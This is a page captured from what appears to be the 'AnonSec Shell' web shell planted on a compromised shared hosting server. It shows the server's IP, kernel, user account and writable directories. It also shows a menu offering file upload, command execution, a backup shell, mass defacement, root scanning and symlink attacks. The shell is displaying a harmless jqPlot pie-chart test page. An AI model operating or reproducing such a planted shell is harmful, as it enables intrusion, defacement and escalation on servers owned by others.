AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 104.23.243.32   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/2388322/task/2388322/cwd/jqplot/dist/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /proc/2388322/task/2388322/cwd/jqplot/dist/examples/pieTest.html
<!DOCTYPE html>

<html lang="en">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title>Simple Test</title>
  <!--[if IE]><script language="javascript" type="text/javascript" src="../excanvas.js"></script><![endif]-->

  <link rel="stylesheet" type="text/css" href="../jquery.jqplot.css" />
  <link rel="stylesheet" type="text/css" href="examples.css" />

  <!-- BEGIN: load jquery -->
  <script language="javascript" type="text/javascript" src="../jquery-1.3.2.min.js"></script>
  <!-- END: load jquery -->

  <!-- BEGIN: load jqplot -->
  <script language="javascript" type="text/javascript" src="../jquery.jqplot.js"></script>
  <script language="javascript" type="text/javascript" src="../plugins/jqplot.pieRenderer.js"></script>
  <script language="javascript" type="text/javascript" src="../plugins/jqplot.trendline.js"></script>
  <!-- END: load jqplot -->

  <script type="text/javascript" language="javascript">

  $(document).ready(function(){

    $.jqplot.config.enablePlugins = true;

    plot1 = $.jqplot('pie', [[['a',25],['b',14],['c',7]]], {
      seriesDefaults:{renderer:$.jqplot.PieRenderer, trendline:{show:true}},
      legend:{show:true}
    });

    plot2 = $.jqplot('pie1', [[['a',25],['b',0],['c',0]]], {
      seriesDefaults:{renderer:$.jqplot.PieRenderer, trendline:{show:true}},
      legend:{show:true}
    });

    plot3 = $.jqplot('pie2', [[["a",1000],["b",.001],["c",.001]]], {
      seriesDefaults:{renderer:$.jqplot.PieRenderer, trendline:{show:true}},
      legend:{show:true}
    });

  });
  </script>
  </head>
  <body>
<?php include "nav.inc"; ?>
    This page tests for 2 conditions.  Plotting pies with a slice that begins at 0 and ends at and near 2*pi (360 degrees) and disabling the trendline plugin on pies.
    <div id="pie" style="margin-top:20px; margin-left:20px; width:200px; height:200px;"></div>
    <div id="pie1" style="margin-top:20px; margin-left:20px; width:200px; height:200px;"></div>
    <div id="pie2" style="margin-top:20px; margin-left:20px; width:200px; height:200px;"></div>
  </body>
</html>

Anon7 - 2022
AnonSec Team